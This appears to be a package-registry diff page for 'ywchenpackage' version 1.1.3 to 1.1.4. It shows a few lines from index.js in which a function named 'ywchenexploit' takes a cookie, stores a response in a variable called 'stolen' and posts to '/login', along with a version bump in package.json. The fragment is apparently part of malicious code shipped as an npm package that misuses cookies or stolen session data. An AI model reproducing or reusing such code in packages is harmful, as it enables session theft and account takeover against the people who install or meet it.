ywchenpackage 1.1.3 → 1.1.4

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -2
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -8,8 +8,7 @@ function ywchenexploit(cookie) {
8
8
  }
9
9
  ).then(
10
10
  (response) => {
11
- let stolen = response[0];
12
- stolen.author = "aaaa";
11
+ let stolen = response;
13
12
  fetch(
14
13
  "/login",
15
14
  {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "ywchenpackage",
3
- "version": "1.1.3",
3
+ "version": "1.1.4",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {